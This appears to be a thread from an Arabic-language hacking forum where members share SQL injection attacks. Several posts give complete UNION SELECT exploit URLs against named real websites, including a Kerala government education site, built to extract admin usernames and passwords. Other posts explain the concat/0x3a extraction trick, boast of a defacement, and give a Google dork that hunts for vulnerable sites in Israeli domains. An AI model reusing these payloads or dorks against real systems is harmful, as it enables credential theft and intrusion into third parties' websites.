السلام عليكم أخي الكريم
بارك الله فيك على الجواااااب استاذي الصغير.
أعتذر لنني لا ادخل كثيرا بسبب العمل ....
ساقوم بتحميل كل الدورات اللي نشرتها فهي مفيدة ..
المهم راك تسالني خمسة كيلو برتقال نتاع غليزان ههههه.
و لا ما ستة كيلو رياضيات المهم أنت لك الخيار ... احلاهما حلو.
تحياتي لك ايها العزيز
السلام عليكم اخوتي الكرام
عيدكم مبارك و كل عام و أنتم بألف خير
يا ريت نكمل الأنواع الأخرى في الحقن
ك Ms-Sql
and Blind
لأن ثغرات السكيوال أصبحت عادية
ثانيا المواقع المهمة تقتضى أكثر من هذا.
تحياتي لكم
من زمان لم أدخل المنتدى بسبب المشاغل
الاستغلال الكامل
http://www.ramora.fr/fiche-auto?id=-4150+UNION+SELECT+1,concat%28admin,0x3a,pass%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admin--
تحياتي لكم
السلام عليكم أخي darkman
الرمز 0x3a هو عبارة عن فاصلة لكن عندما تضيف 0x3a3a تصبح فاصلتين و هكذا
exemple
concat(id,0x3a,passs)
resultat
admin:admin
mais si vous ajoutez 0x3a3a
concat(id,0x3a3a,passs)
resultat
admin::admin
بخصوص الاستعلام
concat_ws هو نفسه concat لكن بدل ما نكتب الفاصلة 0x3a وسط...
تم الدعس
السلام عليكم
حياك الله أخي الكريم
الموقع مصاب و يكفي تغيير السكريبت.
الاستغلال الكامل
http://www.slatina-online.ro/detalii_anunt.php?id_anunt=267&id_categ=3&id_subcateg=-22%20union%20select%201,2,concat_ws(0x3a,id,user,parola)+from+utilizatori--هذا أول عدس لي في المنتدى ......تحياتي
أنا فقط طالب في دورات المنتدى
http://www.education.kerala.gov.in/admin/news_details.php?id=-25+union+select+1,2,@@version,4--
الاصدار الرابع
بخصوص الدورك فهناك مواقع صعب ايجاد ثغرة لها
بالتجربة أنا أعطي قيمة للمتغير حتى يعطيني جوجل جميع السكربتات التي تحتويه
شوف
inurl:"php id=2" site:***.il...